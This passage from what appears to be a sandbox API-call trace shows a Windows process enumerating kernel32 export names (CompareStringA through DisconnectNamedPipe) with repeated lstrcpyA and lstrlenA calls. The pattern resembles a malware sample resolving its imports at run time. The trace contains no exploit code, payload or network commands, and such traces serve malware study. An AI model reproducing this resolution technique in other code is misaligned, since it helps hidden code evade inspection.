lpString1="CompareStringA") returned="CompareStringA" [0181.504] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0181.504] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0181.504] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0181.504] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0181.504] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0181.504] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0181.504] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0181.504] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0181.504] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0181.505] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0181.505] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0181.505] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0181.505] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0181.505] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0181.505] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0181.505] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0181.505] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0181.505] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0181.505] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0181.505] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0181.505] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0181.505] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0181.505] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0181.505] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0181.505] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0181.505] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0181.505] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0181.505] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0181.505] lstrlenA (lpString="COPYCONTEXT") returned 11 [0181.505] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0181.505] lstrlenA (lpString="COPYFILEA") returned 9 [0181.505] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0181.505] lstrlenA (lpString="COPYFILEEXA") returned 11 [0181.505] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0181.505] lstrlenA (lpString="COPYFILEEXW") returned 11 [0181.505] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0181.505] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0181.505] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0181.505] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0181.505] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0181.505] lstrlenA (lpString="COPYFILEW") returned 9 [0181.505] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0181.505] lstrlenA (lpString="COPYLZFILE") returned 10 [0181.505] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0181.506] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0181.506] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0181.506] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0181.506] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0181.506] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0181.506] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0181.506] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0181.506] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0181.506] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0181.507] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0181.507] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0181.507] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0181.507] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0181.507] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0181.507] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0181.507] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0181.507] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0181.507] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0181.507] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0181.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0181.508] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0181.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0181.508] lstrlenA (lpString="CREATEEVENTA") returned 12 [0181.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0181.508] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0181.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0181.508] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0181.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0181.508] lstrlenA (lpString="CREATEEVENTW") returned 12 [0181.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0181.508] lstrlenA (lpString="CREATEFIBER") returned 11 [0181.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0181.508] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0181.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0181.508] lstrlenA (lpString="CREATEFILEA") returned 11 [0181.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0181.508] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0181.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0181.508] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0181.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0181.508] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0181.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0181.508] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0181.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0181.508] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0181.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0181.508] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0181.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0181.508] lstrlenA (lpString="CREATEFILEW") returned 11 [0181.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0181.508] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0181.508] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0181.508] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0181.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0181.509] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0181.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0181.509] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0181.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0181.509] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0181.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0181.509] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0181.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0181.509] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0181.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0181.509] lstrlenA (lpString="CREATEJOBSET") returned 12 [0181.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0181.509] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0181.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0181.509] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0181.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0181.509] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0181.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0181.509] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0181.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0181.509] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0181.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0181.509] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0181.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0181.509] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0181.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0181.509] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0181.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0181.509] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0181.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0181.509] lstrlenA (lpString="CREATEPIPE") returned 10 [0181.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0181.509] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0181.509] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0181.510] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0181.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0181.510] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0181.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0181.510] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0181.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0181.510] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0181.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0181.510] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0181.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0181.510] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0181.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0181.510] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0181.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0181.510] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0181.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0181.510] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0181.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0181.510] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0181.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0181.510] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0181.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0181.510] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0181.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0181.510] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0181.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0181.510] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0181.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0181.510] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0181.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0181.510] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0181.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0181.510] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0181.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0181.510] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0181.510] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0181.511] lstrlenA (lpString="CREATETHREAD") returned 12 [0181.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0181.511] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0181.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0181.511] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0181.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0181.511] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0181.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0181.511] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0181.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0181.511] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0181.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0181.511] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0181.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0181.511] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0181.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0181.511] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0181.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0181.511] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0181.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0181.511] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0181.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0181.511] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0181.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0181.511] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0181.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0181.511] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0181.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0181.511] lstrlenA (lpString="CTRLROUTINE") returned 11 [0181.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0181.511] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0181.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0181.511] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0181.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0181.511] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0181.511] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0181.512] lstrlenA (lpString="DEBUGBREAK") returned 10 [0181.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0181.512] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0181.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0181.512] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0181.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0181.512] lstrlenA (lpString="DECODEPOINTER") returned 13 [0181.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0181.512] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0181.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0181.512] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0181.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0181.512] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0181.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0181.512] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0181.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0181.512] lstrlenA (lpString="DELETEATOM") returned 10 [0181.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0181.512] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0181.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0181.512] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0181.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0181.512] lstrlenA (lpString="DELETEFIBER") returned 11 [0181.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0181.512] lstrlenA (lpString="DELETEFILEA") returned 11 [0181.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0181.512] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0181.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0181.512] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0181.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0181.512] lstrlenA (lpString="DELETEFILEW") returned 11 [0181.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0181.512] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0181.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0181.512] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0181.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0181.513] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0181.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0181.513] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0181.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0181.513] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0181.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0181.513] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0181.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0181.513] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0181.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0181.513] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0181.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0181.513] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0181.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0181.513] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0181.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0181.513] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0181.513] lstrcpyA (in: lpString1=0x36fcbb4, 